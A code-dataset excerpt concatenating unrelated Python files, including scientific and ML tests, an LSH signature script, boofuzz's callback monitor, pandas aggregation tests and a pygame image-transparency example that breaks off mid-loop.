('http://namespaces.zope.org/zope:module',
'testing', 'bar'))
self.assertTrue(context._actions[1]['callable'] is protectModule)
self.assertEqual(context._actions[1]['args'],
('testing', 'bar', perm))
self.assertEqual(context._actions[2]['discriminator'],
('http://namespaces.zope.org/zope:module',
'testing', 'baz'))
self.assertTrue(context._actions[2]['callable'] is protectModule)
self.assertEqual(context._actions[2]['args'],
('testing', 'baz', perm))
class DummyZCMLContext(object):
def __init__(self):
self._actions = []
def action(self, **kw):
self._actions.append(kw.copy())
def test_suite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
| StarcoderdataPython |
6515315 | """
Unit tests for output structures
"""
import pytest
import copy
import pickle
from py21cmfast import InitialConditions # An example of an output struct
from py21cmfast import IonizedBox, PerturbedField, TsBox, global_params
@pytest.fixture(scope="function")
def init(default_user_params):
return InitialConditions(user_params=default_user_params)
@pytest.mark.parametrize("cls", [InitialConditions, PerturbedField, IonizedBox, TsBox])
def test_pointer_fields(cls):
if cls is InitialConditions:
inst = cls()
else:
with pytest.raises(KeyError):
cls()
inst = cls(redshift=7.0)
# Get list of fields before and after array initialisation
d = copy.copy(list(inst.__dict__.keys()))
inst._init_arrays()
new_names = [name for name in inst.__dict__ if name not in d]
assert new_names
assert all(n in inst.pointer_fields for n in new_names)
# cstruct shouldn't be initialised,
assert not inst.arrays_initialized
inst._init_cstruct()
assert inst.arrays_initialized
def test_non_existence(init, test_direc):
assert not init.exists(direc=test_direc)
def test_writeability(init):
"""init is not initialized and therefore can't write yet."""
with pytest.raises(IOError):
init.write()
def test_readability(test_direc, default_user_params):
# we update this one, so don't use the global one
ic_ = InitialConditions(init=True, user_params=default_user_params)
# TODO: fake it being filled (need to do both of the following to fool it.
# TODO: Actually, we *shouldn't* be able to fool it at all, but hey.
ic_.filled = True
ic_.random_seed # accessing random_seed actually creates a random seed.
ic_.write(direc=test_direc)
ic2 = InitialConditions(user_params=default_user_params)
# without seeds, they are obviously exactly the same.
assert ic_._seedless_repr() == ic2._seedless_repr()
assert ic2.exists(direc=test_direc)
ic2.read(direc=test_direc)
assert repr(ic_) == repr(ic2) # they should be exactly the same.
assert str(ic_) == str(ic2) # their str is the same.
assert hash(ic_) == hash(ic2)
assert ic_ == ic2
assert ic_ is not ic2
# make sure we can't read it twice
with pytest.raises(IOError):
ic2.read(direc=test_direc)
def test_different_seeds(init, default_user_params):
ic2 = InitialConditions(random_seed=2, user_params=default_user_params)
assert init is not ic2
assert init != ic2
assert repr(init) != repr(ic2)
assert init._seedless_repr() == ic2._seedless_repr()
assert init._md5 == ic2._md5
# make sure we didn't inadvertantly set the random seed while doing any of this
assert init._random_seed is None
def test_pickleability(default_user_params):
ic_ = InitialConditions(init=True, user_params=default_user_params)
ic_.filled = True
ic_.random_seed
s = pickle.dumps(ic_)
ic2 = pickle.loads(s)
assert repr(ic_) == repr(ic2)
def test_fname(default_user_params):
ic1 = InitialConditions(user_params=default_user_params)
ic2 = InitialConditions(user_params=default_user_params)
# we didn't give them seeds, so can't access the filename attribute
# (it is undefined until a seed is set)
with pytest.raises(AttributeError):
assert ic1.filename != ic2.filename # random seeds are different
# *but* should be able to get a skeleton filename:
assert ic1._fname_skeleton == ic2._fname_skeleton
ic1.random_seed # sets the random seed
ic2.random_seed
assert ic1.filename != ic2.filename # random seeds should now be different
assert ic1._fname_skeleton == ic2._fname_skeleton
def test_match_seed(test_direc, default_user_params):
# we update this one, so don't use the global one
ic_ = InitialConditions(init=True, random_seed=12, user_params=default_user_params)
# fake it being filled
ic_.filled = True
ic_.random_seed
ic_.write(direc=test_direc)
ic2 = InitialConditions(random_seed=1, user_params=default_user_params)
# should not read in just anything if its random seed is set.
with pytest.raises(IOError):
ic2.read(direc=test_direc)
def test_bad_class_definition(default_user_params):
class CustomInitialConditions(InitialConditions):
_name = "InitialConditions"
"""
A class containing all initial conditions boxes.
"""
def _init_arrays(self):
super()._init_arrays()
# remove one of the arrays that needs to be defined.
del self.hires_density
with pytest.raises(AttributeError):
CustomInitialConditions(init=True, user_params=default_user_params)
def test_pre_expose(init):
# haven't actually tried to read in or fill the array yet.
with pytest.raises(Exception):
init._expose()
def test_bad_write(init):
init.filled = True
# no random seed yet so shouldn't be able to write.
with pytest.raises(ValueError):
init.write()
def test_global_params_keys():
assert "HII_FILTER" in global_params.keys()
| StarcoderdataPython |
6468811 | import numpy as np
import json
class NCA():
def __init__(self, var_dims, learning_rate = 0.01, max_steps = 100, init_style = "normal", init_stddev = 0.1):
self.var_dims = var_dims
self.learning_rate = learning_rate
self.max_steps = max_steps
self.init_style = init_style
self.init_stddev = init_stddev
def transform(self, X):
halfM = np.dot(X, self.A)
return halfM
def fit_transform(self, X, Y):
self.fit(X, Y)
halfM = self.transform(X)
return halfM
def init_matrix(self, shape):
if self.init_style == "normal":
return self.init_stddev * np.random.standard_normal(size = shape)
elif self.init_style == "uniform":
return np.random.uniform(size = shape)
else:
print("error style!")
raise Exception
def fit(self, X, Y):
(n, d) = X.shape
self.n_samples = n
self.param_dims = d
self.A = self.init_matrix(shape = (self.param_dims, self.var_dims))
s = 0
target = 0
res = []
while s < self.max_steps:
if s >= 1:
res.append(target)
halfM = np.dot(X, self.A)
sum_row = np.sum(halfM ** 2, axis = 1)
xxt = np.dot(halfM, halfM.transpose())
#broadcast
dist_mat = sum_row + np.reshape(sum_row, (-1, 1)) - 2 * xxt
exp_neg_dist = np.exp(-dist_mat)
exp_neg_dist = exp_neg_dist - np.diag(np.diag(exp_neg_dist))
prob_mat = exp_neg_dist / np.sum(exp_neg_dist, axis = 1).reshape((-1, 1))
# calc p
prob_row = np.array([np.sum(prob_mat[i][Y == Y[i]]) for i in range(self.n_samples)])
target = np.sum(prob_row)
gradients = np.zeros((self.param_dims, self.param_dims))
for i in range(self.n_samples):
k_sum = np.zeros((self.param_dims, self.param_dims))
k_same_sum = np.zeros((self.param_dims, self.param_dims))
# for k
for k in range(self.n_samples):
out_prod = np.outer(X[i] - X[k], X[i] - X[k])
k_sum += prob_mat[i][k] * out_prod
if Y[k] == Y[i]:
k_same_sum += prob_mat[i][k] * out_prod
gradients += prob_row[i] * k_sum - k_same_sum
gradients = 2 * np.dot(gradients, self.A)
self.A += self.learning_rate * gradients
s += 1
result = json.dumps({ 'result': res })
f = open('fA_' + str(self.learning_rate) + '.json', 'w+')
f.write(result)
f.close() | StarcoderdataPython |
1952472 | import matplotlib
import numpy as np #for array operations
from sklearn import model_selection # spliting the data (80,20)
import pandas #used toread csv file
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
'''------------------ALGORITHMS---------------------'''
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
print("-------------STARTING-----------------\n")
names=['sepal-length','sepal-width','petal-length','petal-width','class']
dataset=pandas.read_csv('./iris.csv',names=names)
print(f"\n----------classes-----------\n {dataset.groupby('class').size()}\n---------------------------\n")
#print(dataset)
#split-out validation or test data (80% training data) /(20% test data)
array=dataset.values
x=array[:,0:4]
y=array[:,4]
validation_size=0.20 #20%
seed=7
scoring='accuracy'
#it splits the data into two sets training set(which is used to train the model) and test data(which is used to check or measure the accuracy of the model)
x_train, x_test, y_train, y_test=model_selection.train_test_split(x,y,test_size=validation_size,random_state=seed)
#ALGORITHMS
models=[] #empty list
models.append(('LR',LogisticRegression(solver='liblinear',multi_class='ovr')))
models.append(('LDA',LinearDiscriminantAnalysis()))
models.append(('KNN',KNeighborsClassifier()))
models.append(('CART',DecisionTreeClassifier()))
models.append(('NB',GaussianNB()))
models.append(('SVM',SVC(gamma='auto')))
results=[]
names=[]
for name,model in models:
'''kfold : Provides train/test indices to split data in train/test
sets. Split dataset into k consecutive folds (without shuffling by default).
Each fold is then used once as a validation while the k - 1
remaining folds form the training set.'''
kfold=model_selection.KFold(n_splits=10,random_state=seed)
cv_results=model_selection.cross_val_score(model, x_train,y_train,cv=kfold,scoring=scoring)
results.append(cv_results)
names.append(name)
print(f"{name} : {cv_results.mean()*100}%")
print("-----------------using seperately---------------------")
knn=KNeighborsClassifier()
knn.fit(x_train,y_train)
predictions=knn.predict(x_test)
print(str(accuracy_score(y_test,predictions)*100)+" %")
print(confusion_matrix(y_test,predictions))
print(classification_report(y_test,predictions))
print("\n-------------------ENTER ATTRIBUTES(prediction using SVC)-----------------------\n")
sepallength=float(input("Enter sepal-length : "))
sepalwidth=float(input("Enter sepal-width : "))
petallength=float(input("Enter petal-length : "))
petalwidth=float(input("Enter petal-width : "))
input_data=np.array([sepallength,sepalwidth,petallength,petalwidth])
input_data=input_data.reshape(1,-1)
svm_model=SVC(gamma='auto')
svm_model.fit(x_train,y_train)
predictions=svm_model.predict(input_data)
print("\n--------------------------------\n")
print(f"class : {predictions[0]}")
print("\n--------------------------------\n") | StarcoderdataPython |
11389363 | from __future__ import absolute_import, division, print_function, unicode_literals
import json
import unittest
from amaascore.market_data.eod_price import EODPrice
from amaascore.tools.generate_market_data import generate_eod_price
class EODPriceTest(unittest.TestCase):
def setUp(self):
self.longMessage = True # Print complete error message on failure
self.eod_price = generate_eod_price()
self.asset_id = self.eod_price.asset_id
def tearDown(self):
pass
def test_EODPrice(self):
self.assertEqual(type(self.eod_price), EODPrice)
def test_EODPriceToDict(self):
eod_price_dict = self.eod_price.__dict__
self.assertEqual(type(eod_price_dict), dict)
self.assertEqual(eod_price_dict.get('asset_id'), self.asset_id)
def test_EODPriceToJSON(self):
eod_price_json = self.eod_price.to_json()
self.assertEqual(eod_price_json.get('asset_id'), self.asset_id)
# If party_json is valid JSON, this will run without serialisation errors
json_asset_id = json.loads(json.dumps(eod_price_json, ensure_ascii=False)).get('asset_id')
self.assertEqual(json_asset_id, self.asset_id)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
9799568 | global Device
from src.utils import *
from src.utils.read_data import SentenceDataset
from collections import defaultdict
from src.sbert_lsh_model import SBERTLSHModel, BertLSHModel
import os
OPTS = Config.from_command_line(
arg_defaults=[
##### I/O ####
("input", str, "", "input data file: source - target tsv"),
("split", str, "", "split"),
("output_dir", str, "", "output path"),
#### BERT #####
("bert_type", str, "sbert", "type of BERT from which to extract embeddings"),
("sbert_type", str, 'roberta-large', 'if bert_type is sbert, the base type'),
("batch_size", int, 32, "Batch size"),
("gpuid", int, -1, "GPU ID (-1 for CPU)"),
("max_seq_length", int, 20, "model max seq len"),
#### MULTI JOBS ####
("local_rank", int, -1, "batch displacement for distributed feature extraction"),
("num_threads", int, 1, ""),
#### SIGNATURE OPTS #####
("lsh_dim", int, 10, "number of base vectors for LSH hash (= number bits in signature)"),
("sep_token", str, "$SEP$", "separating token"),
#### SOURCE/TARGET PARAMS ####
("source_repr", str, "seq", "representation of source {seq, both, prefix}. for multiple concat w/comma"),
("target_repr", str, "both", "representation of target {seq, both, prefix}. for multiple concat w/comma"),
("source_lang", str, "cause", "source language"),
("target_lang", str, "effect", "source language"),
#### MISC ####
("debug", int, 0, "debug"),
("seed", int, 1234, "random seed"),
("remove_end_punc", int, 1, 'whether to strip the period from the end (for copa examples)'),
('exclude_prefix_patterns', int, 1, 'hacky exclusion of effects with ill-formed patterns from causalbank'),
('example_bins', int, 0, 'print bins with most examples'),
],
description="prepends bit signatures to training/dev/test data"
)
for req_attr in [
'input', 'split', 'output_dir'
]:
assert not not getattr(OPTS, req_attr)
from pathlib import Path
Path(OPTS.output_dir).mkdir(parents=True, exist_ok=True)
## set up device
Device.set_device(OPTS.gpuid)
Device.set_seed(OPTS.seed)
## set up tokenizer and BERT
print("loading model...")
if OPTS.bert_type in ['bert']:
sim_model = BertLSHModel(OPTS, Device)
elif OPTS.bert_type in ['sbert']:
sim_model = SBERTLSHModel(OPTS, Device)
else:
raise NotImplementedError()
## initialize dataset reader/loader
print('initializing dataset...')
if OPTS.num_threads > 1:
every = OPTS.num_threads
assert (OPTS.local_rank > 0 and OPTS.local_rank <= OPTS.num_threads)
displace = OPTS.local_rank - 1
else:
every = 1
displace = 0
dataset = SentenceDataset(OPTS.input, every=every, displace=displace)
loader = tsv_reader(dataset, OPTS)
initialized_lsh = False
signature_counts = defaultdict(lambda: defaultdict(int))
writers = defaultdict(dict)
for side, opt in zip([OPTS.source_lang, OPTS.target_lang], [OPTS.source_repr, OPTS.target_repr]):
for repr in opt.split(','):
repr = repr.strip()
out_file = f"{OPTS.split}.{side}.{repr}"
writers[side][repr] = open(os.path.join(OPTS.output_dir, out_file), 'w', encoding='utf-8')
if OPTS.example_bins:
ex_strings = defaultdict(list)
else:
ex_strings = None
skipped_instances = 0
for i, pair in enumerate(loader):
(source_batch, target_batch) = pair
source_batch, target_batch = zip(*[
(t, s) for (t, s) in zip(source_batch, target_batch)
if len(t.split()) <= OPTS.max_seq_length and len(s.split()) <= OPTS.max_seq_length
])
bert_features = {}
if any([repr in OPTS.target_repr for repr in ['both', 'prefix']]):
bert_features[OPTS.target_lang] = sim_model.get_embeddings([
well_formed_sentence(t) for t in target_batch
])
if i == 0 and OPTS.debug:
ppr(target_batch[:10])
if any([repr in OPTS.source_repr for repr in ['both', 'prefix']]):
bert_features[OPTS.source_lang] = sim_model.get_embeddings([
well_formed_sentence(s) for s in source_batch
])
if i == 0 and OPTS.debug:
ppr(source_batch[:10])
if not initialized_lsh:
sim_model.hasher.reset(
dim=bert_features[OPTS.target_lang if
OPTS.target_lang in bert_features
else OPTS.source_lang].shape[-1]
)
initialized_lsh = True
signatures = {
k: [sim_model.hasher.hash_vector(output)[0] for output in bert_features[k]]
for k in bert_features
}
for b_idx, (source, target) in enumerate(zip(source_batch, target_batch)):
### hack to handle ill formed causalbank bug
if OPTS.exclude_prefix_patterns:
proc_effect = target.lower().strip()
if any([proc_effect.endswith(x) for x in [
'be',
'maybe',
'actually',
'partly',
'it is',
'it was',
'that was',
'that is',]]):
skipped_instances += 1
continue
to_sig = lambda s_str: str(sum([(2 ** i) * int(b) for (i, b) in enumerate(s_str[::-1])]))
for side, writer_dict, seq in zip(
[OPTS.source_lang, OPTS.target_lang],
[writers[OPTS.source_lang], writers[OPTS.target_lang]],
[source, target]
):
if any([pr in writer_dict.keys() for pr in ['both', 'prefix']]):
sig_str = ' '.join(
[f"${to_sig(chunk)}$"
for chunk in chunks(signatures[side][b_idx], OPTS.lsh_dim)]
+ [OPTS.sep_token]) + ' '
signature_counts[side][sig_str] += 1
else:
sig_str = ''
if ex_strings is not None:
ex_strings[sig_str].append(seq)
for repr, writer in writer_dict.items():
if repr == 'prefix':
seq_str = ''
else:
seq_str = model_output_sentence(seq)
if repr == 'seq':
out_str = seq_str
else:
out_str = sig_str + seq_str
writer.write(out_str + '\n')
if OPTS.debug and i == 5: break
for _, dic in writers.items():
for writ in dic.values(): writ.close()
| StarcoderdataPython |
1617017 | import traceback
from boofuzz import constants, exception
from .base_monitor import BaseMonitor
class CallbackMonitor(BaseMonitor):
"""
New-Style Callback monitor that is used in Session to provide callback-arrays.
It's purpose is to keep the \\*_callbacks arguments in the session class while
simplifying the implementation of session by forwarding these callbacks to
the monitor infrastructure.
The mapping of arguments to method implementations of this class is as follows:
- restart_callbacks --> target_restart
- pre_send_callbacks --> pre_send
- post_test_case_callbacks --> post_send
- post_start_target_callbacks --> post_start_target
All other implemented interface members are stubs only, as no corresponding
arguments exist in session. In any case, it is probably wiser to implement
a custom Monitor than to use the callback functions.
.. versionadded:: 0.2.0
"""
def __init__(self, on_pre_send=None, on_post_send=None, on_restart_target=None, on_post_start_target=None):
BaseMonitor.__init__(self)
self.on_pre_send = on_pre_send if on_pre_send is not None else []
self.on_post_send = on_post_send if on_post_send is not None else []
self.on_restart_target = on_restart_target if on_restart_target is not None else []
self.on_post_start_target = on_post_start_target if on_post_start_target is not None else []
def pre_send(self, target=None, fuzz_data_logger=None, session=None):
"""This method iterates over all supplied pre send callbacks and executes them.
Their return values are discarded, exceptions are catched and logged, but otherwise
discarded.
"""
try:
for f in self.on_pre_send:
fuzz_data_logger.open_test_step('Pre_Send callback: "{0}"'.format(f.__name__))
f(target=target, fuzz_data_logger=fuzz_data_logger, session=session, sock=target)
except Exception:
fuzz_data_logger.log_error(
constants.ERR_CALLBACK_FUNC.format(func_name="pre_send") + traceback.format_exc()
)
def post_send(self, target=None, fuzz_data_logger=None, session=None):
"""This method iterates over all supplied post send callbacks and executes them.
Their return values are discarded, exceptions are caught and logged:
- :class:`BoofuzzTargetConnectionReset <boofuzz.exception.BoofuzzTargetConnectionReset>` will log a failure
- :class:`BoofuzzTargetConnectionAborted <boofuzz.exception.BoofuzzTargetConnectionAborted>` will log an info
- :class:`BoofuzzTargetConnectionFailedError <boofuzz.exception.BoofuzzTargetConnectionFailedError>` will log a
failure
- :class:`BoofuzzSSLError <boofuzz.exception.BoofuzzSSLError>` will log either info or failure, depending on
if the session ignores SSL/TLS errors.
- every other exception is logged as an error.
All exceptions are discarded after handling.
"""
try:
for f in self.on_post_send:
fuzz_data_logger.open_test_step('Post-test case callback: "{0}"'.format(f.__name__))
f(target=target, fuzz_data_logger=fuzz_data_logger, session=session, sock=target)
except exception.BoofuzzTargetConnectionReset:
fuzz_data_logger.log_fail(constants.ERR_CONN_RESET_FAIL)
except exception.BoofuzzTargetConnectionAborted as e:
fuzz_data_logger.log_info(
constants.ERR_CONN_ABORTED.format(socket_errno=e.socket_errno, socket_errmsg=e.socket_errmsg)
)
except exception.BoofuzzTargetConnectionFailedError:
fuzz_data_logger.log_fail(constants.ERR_CONN_FAILED)
except exception.BoofuzzSSLError as e:
if session._ignore_connection_ssl_errors:
fuzz_data_logger.log_info(str(e))
else:
fuzz_data_logger.log_fail(str(e))
except Exception:
fuzz_data_logger.log_error(
constants.ERR_CALLBACK_FUNC.format(func_name="post_send") + traceback.format_exc()
)
finally:
fuzz_data_logger.open_test_step("Cleaning up connections from callbacks")
return True
def restart_target(self, target=None, fuzz_data_logger=None, session=None):
"""
This Method tries to restart a target. If no restart callbacks are set,
it returns false; otherwise it returns true.
:returns: bool
"""
try:
for f in self.on_restart_target:
fuzz_data_logger.open_test_step('Target restart callback: "{0}"'.format(f.__name__))
f(target=target, fuzz_data_logger=fuzz_data_logger, session=session, sock=target)
except exception.BoofuzzRestartFailedError:
raise
except Exception:
fuzz_data_logger.log_error(
constants.ERR_CALLBACK_FUNC.format(func_name="restart_target") + traceback.format_exc()
)
finally:
fuzz_data_logger.open_test_step("Cleaning up connections from callbacks")
target.close()
if session._reuse_target_connection:
fuzz_data_logger.open_test_step("Reopening target connection")
target.open()
if len(self.on_restart_target) > 0:
return True
else:
return False
def post_start_target(self, target=None, fuzz_data_logger=None, session=None):
"""Called after a target is started or restarted."""
try:
for f in self.on_post_start_target:
fuzz_data_logger.open_test_step('Post-start-target callback: "{0}"'.format(f.__name__))
f(target=target, fuzz_data_logger=fuzz_data_logger, session=session, sock=target)
except Exception:
fuzz_data_logger.log_error(
constants.ERR_CALLBACK_FUNC.format(func_name="post_start_target") + traceback.format_exc()
)
def __repr__(self):
return "CallbackMonitor#{}[pre=[{}],post=[{}],restart=[{}],post_start_target=[{}]]".format(
id(self),
", ".join([x.__name__ for x in self.on_pre_send]),
", ".join([x.__name__ for x in self.on_post_send]),
", ".join([x.__name__ for x in self.on_restart_target]),
", ".join([x.__name__ for x in self.on_post_start_target]),
)
| StarcoderdataPython |
11307102 | # MIT License
#
# Copyright (c) 2020 OdinLabs IO
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import unittest
import numpy
import pandas as pd
from app.aggregation import pandas_eval_factory
from app.aggregation.aggregation_expr import aggregation_dag
eval_factory = pandas_eval_factory()
class AggregationDAGTest(unittest.TestCase):
def test_reduction_dag(self):
"""Simple aggregation statement parsing"""
df = pd.DataFrame({'A': [0, 1, 2, 3, 4],
'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
'C': ['Jan', 'Jan', 'Jan', 'Feb', 'Feb']})
dag = aggregation_dag("SUM('A', EQ('B', \"Lundi\"))")
evaluator = eval_factory.evaluator('aggregationStatement').build(0, dag)
result = \
df.groupby(['B']).apply(
lambda x: pd.DataFrame({'m': evaluator(x, evaluator.emit_columns())}))
index = result.index
result.index = index.droplevel(len(index.names) - 1)
print(result)
result = result.reset_index()['m']
self.assertEqual(len(result), 1)
self.assertEqual(result[0], 1)
result = df.groupby(['B', 'C']).apply(
lambda x: pd.DataFrame({'m': evaluator(x, evaluator.emit_columns())}))
index = result.index
result.index = index.droplevel(len(index.names) - 1)
print(result)
result = result.reset_index()
self.assertEqual(len(result), 1)
m = result['m']
self.assertEqual(m[0], 1)
B = result['B']
self.assertEqual(B[0], 'Lundi')
C = result['C']
self.assertEqual(C[0], 'Jan')
def test_cum_sum(self):
df = pd.DataFrame({'A': [4, 3, 2, 1, 0],
'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
'D': [20, 30, 40, 50, 60]})
dag = aggregation_dag("CUMSUM(ASC 'A', 'D')")
evaluator = eval_factory.evaluator('aggregationStatement').build(0, dag)
result = df.groupby(['B']).apply(lambda x: pd.DataFrame({'m': evaluator(x, evaluator.emit_columns())}))
print(result)
result = result.reset_index()
m = result['m']
self.assertEqual(m[0], 30)
self.assertEqual(m[1], 50)
self.assertEqual(m[2], 40)
self.assertEqual(m[3], 60)
self.assertEqual(m[4], 110)
def test_rol_sum(self):
df = pd.DataFrame({'A': [4, 3, 2, 1, 0],
'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
'D': [20, 30, 40, 50, 60]})
dag = aggregation_dag("ROLSUM(2, ASC 'A', 'D')")
evaluator = eval_factory.evaluator('aggregationStatement').build(0, dag)
result = df.groupby(['B']).apply(lambda x: pd.DataFrame({'m': evaluator(x, evaluator.emit_columns())}))
print(result)
result = result.reset_index()
m = result['m']
self.assertEqual(m[0], 30)
self.assertEqual(m[1], 50)
self.assertEqual(m[2], 40)
self.assertEqual(m[3], 60)
self.assertEqual(m[4], 110)
def test_rol_sum_and_sum_aggr(self):
df = pd.DataFrame({'A': [4, 3, 2, 1, 27],
'T': ["2020-01-01", "2020-01-02", "2020-01-03", "2020-01-04", "2020-01-05"],
'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
'D': [20, 30, 40, 50, 60]})
dag1 = aggregation_dag("SUM('D')")
dag2 = aggregation_dag("ROLSUM(2, DESC 'T', 'D')")
evaluator1 = eval_factory.evaluator('aggregationStatement').build(0, dag1)
evaluator2 = eval_factory.evaluator('aggregationStatement').build(0, dag2)
index = []
index += evaluator1.emit_columns()
index += evaluator2.emit_columns()
result = df.groupby(['B']).apply(
lambda x: pd.DataFrame({'m': evaluator1(x, index), 'm2': evaluator2(x, index)}))
# index = result.index
# index = index.droplevel(len(index.names)-1)
# result.index = index
print(result)
result = result.reset_index()
m = result['m2']
self.assertEqual(m[0], 50.0)
self.assertEqual(m[1], 30.0)
self.assertEqual(m[2], 40.0)
self.assertEqual(m[3], 110.0)
self.assertEqual(m[4], 60.0)
m = result['m']
self.assertEqual(m[0], 20.0)
self.assertEqual(m[1], 30.0)
self.assertEqual(m[2], 40.0)
self.assertEqual(m[3], 50.0)
self.assertEqual(m[4], 60.0)
def test_rol_sum_and_sum_aggr_filter(self):
df = pd.DataFrame({'A': [4, 3, 2, 1, 27],
'T': ["2020-01-01", "2020-01-02", "2020-01-03", "2020-01-04", "2020-01-05"],
'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
'D': [20, 30, 40, 50, 60]})
dag1 = aggregation_dag("SUM('D', IN('B', [\"Lundi\",\"Mercredi\"]))")
dag2 = aggregation_dag("ROLSUM(2, DESC 'T', 'D')")
evaluator1 = eval_factory.evaluator('aggregationStatement').build(0, dag1)
evaluator2 = eval_factory.evaluator('aggregationStatement').build(0, dag2)
index = []
index += evaluator1.emit_columns()
index += evaluator2.emit_columns()
result = df.groupby(['B']).apply(
lambda x: pd.DataFrame({'m': evaluator1(x, index), 'm2': evaluator2(x, index)}))
# index = result.index
# index = index.droplevel(len(index.names)-1)
# result.index = index
print(result)
result = result.reset_index()
m = result['m2']
self.assertEqual(m[0], 50.0) # asc order preserved because of sum index
self.assertEqual(m[1], 30.0)
self.assertEqual(m[2], 40.0)
self.assertEqual(m[3], 60.0) # desc
self.assertEqual(m[4], 110.0)
m = result['m']
self.assertEqual(m[0], 20.0)
self.assertEqual(m[1], 30.0)
self.assertEqual(m[2], 40.0)
self.assertTrue(numpy.math.isnan(m[3]))
self.assertTrue(numpy.math.isnan(m[4]))
def test_rol_sum_and_count(self):
df = pd.DataFrame({'A': [4, 3, 2, 1, 27],
'T': ["2020-01-01", "2020-01-02", "2020-01-03", "2020-01-04", "2020-01-05"],
'B': ['Lundi', 'Lundi', 'Mercredi', 'Vendredi', 'Vendredi'],
'D': [20, 30, 40, 50, 60]})
dag1 = aggregation_dag("COUNT('D')")
dag3 = aggregation_dag("UCOUNT('D')")
dag2 = aggregation_dag("ROLSUM(2, DESC 'T', 'D')")
evaluator1 = eval_factory.evaluator('aggregationStatement').build(0, dag1)
evaluator2 = eval_factory.evaluator('aggregationStatement').build(0, dag2)
evaluator23 = eval_factory.evaluator('aggregationStatement').build(0, dag3)
index = []
index += evaluator1.emit_columns()
index += evaluator2.emit_columns()
result = df.groupby(['B']).apply(
lambda x: pd.DataFrame(
{'m': evaluator1(x, index), 'm2': evaluator2(x, index), 'm3': evaluator23(x, index)}))
# index = result.index
# index = index.droplevel(len(index.names)-1)
# result.index = index
print(result)
result = result.reset_index()
m = result['m2']
self.assertEqual(m[0], 50.0)
self.assertEqual(m[1], 30.0)
self.assertEqual(m[2], 40.0)
self.assertEqual(m[3], 110.0)
self.assertEqual(m[4], 60.0)
m = result['m']
self.assertEqual(m[0], 1)
self.assertEqual(m[1], 1)
self.assertEqual(m[2], 1)
self.assertEqual(m[3], 1)
self.assertEqual(m[4], 1)
m = result['m3']
self.assertEqual(m[0], 1)
self.assertEqual(m[1], 1)
self.assertEqual(m[2], 1)
self.assertEqual(m[3], 1)
self.assertEqual(m[4], 1)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
228823 | <filename>project_proteus/env/simple/simple_config.py
from project_proteus.env.base import BaseConfig
class SimpleConfig(BaseConfig):
class database:
#path to the database
path = ""
#which candlestick interval should be used in the environment
candlestick_interval = ""
class portfolio:
#the initial amount of the quote asset
#example: symbol=BTCUSDT --> initial_amount = amount of USDT in the beginning
initial_amount = 1000
#trading fees of the exchange in percent
trading_fees = 0.036 #[%]
class env:
#number of steps the agent can take in the environment before it gets reset
num_steps = 10
window_length = 10 | StarcoderdataPython |
1888641 | words = input().split(", ")
result = [f"{word} -> {len(word)}" for word in words]
print(", ".join(result))
| StarcoderdataPython |
11385387 | import pygame
'''The following code shows how to add transparency to an
image and shows which images can be made transparent.
This example was created using this tutorial
https://www.pygame.org/docs/tut/ChimpLineByLine.html
Line By Line Chimp
Author: <NAME>
https://www.pygame.org/docs/ref/surface.html
Colorkey transparency makes a single color value transparent.
Per pixel alphas are different because they store a transparency value
for every pixel. This allows for the most precise transparency effects,
but it also the slowest. Per pixel alphas cannot be mixed with surface
alpha and colorkeys.
'''
def loadImage(name, colorkey=None):
#Load the image from file
try:
image = pygame.image.load(name)
except pygame.error:
print('ERROR: Failed to load image named "'+name+'". Probably a typo.')
pygame.quit()
exit()
#This next line creates a copy that will draw more quickly on the screen.
image = image.convert()
#If colorkey is None, then don't worry about transparency
if colorkey is not None:
#colorkey of -1 means that the color of upper left most pixel should
#be used as transparency color.
if colorkey is -1:
colorkey = image.get_at((0,0))
'''The optional flags argument can be set to pygame.RLEACCEL to provide better performance on non accelerated displays. An RLEACCEL Surface will be slower to modify, but quicker to blit as a source.'''
image.set_colorkey(colorkey, pygame.RLEACCEL)
#Return the image
return image
if __name__ == "__main__":
pygame.init()
width = 600
height = 600
screen = pygame.display.set_mode((width, height))
clock = pygame.time.Clock()
pygame.display.set_caption('Transparency Example')
pygame.mouse.set_visible(0) #Invisible mouse!
black = 0,0,0
white = 255,255,255
blue = 0,0,255
#Load images
#-1 tells loadImage to use upper left most pixel color as transparent color
image0 = loadImage('hand.jpg', -1) #Transparency DOES NOT work with jpegs
image1 = loadImage('ball.png', -1) #Transparency works with pngs
image2 = loadImage('destroyer.gif', -1) #Transparency works with gifs
image3 = loadImage('ball.png') #No transparency because no -1
image4 = loadImage('blue_example.png', blue) #Alternate colorkey example
image5 = loadImage('planet002.png', -1) #Transparency works with previously transparent pixels
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
screen.fill(blue) #paint background blue
#Draw all the images on the screen.
